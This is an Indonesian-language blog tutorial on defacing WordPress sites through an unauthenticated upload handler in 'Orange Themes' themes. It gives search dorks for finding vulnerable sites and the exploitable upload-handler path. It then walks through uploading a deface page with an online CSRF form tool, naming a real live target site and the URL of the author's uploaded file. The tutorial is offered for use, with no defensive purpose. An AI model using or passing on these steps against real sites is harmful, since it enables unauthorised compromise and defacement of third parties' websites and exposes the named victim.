Deface POC ORANGE THEMES
Hii, Ketemu lagi sama gw Kali Ini Gw Bakalan Kasi tutorial deface poc wp orange themes ini poc cukup lama tapi masih ada web yg vuln
Bahan2
-Hp/Pc
-Dork
-Exploit
-Sc Deface
Dork:
inurl:/wp-content/themes/kernel-theme
inurl:/wp-content/themes/bordeaux-theme
inurl:/wp-content/themes/bulteno-theme
inurl:/wp-content/themes/rayoflight-theme
Exploit:
wp-content/themes/rockstar-theme/functions/upload-handler.php
Karna gua ada live target jadi kaga usah ngedork lagi
Target gw:https://www.123rock.net/
Tinggal Tambahin Aja Exploit Nya Contoh:
https://www.123rock.net/wp-content/themes/rockstar-theme/functions/upload-handler.php
kalo tampilan nya kek gini tandanya web nya vuln langsung aja salin lalu ke csrf online
Tempel di url target untuk post file orange_themes kalo udh klik Lock Target dan upload sc deface kalian
Kalo keluar nama sc yg kalian upload itu tanda berhasil ke upload tinggal panggil aja sc nya
Caranya?
www.site.com/wp-content/uploads/tahun/bulan/sclu.html
Gw Panggil Punya Gw:
https://www.123rock.net/wp-content/uploads/2023/10/Max.html
Oke siap!
segitu aja tutor dari gw kali ini semoga bermanfaat sekian dan terimakasih'
.jpeg)
0 Komentar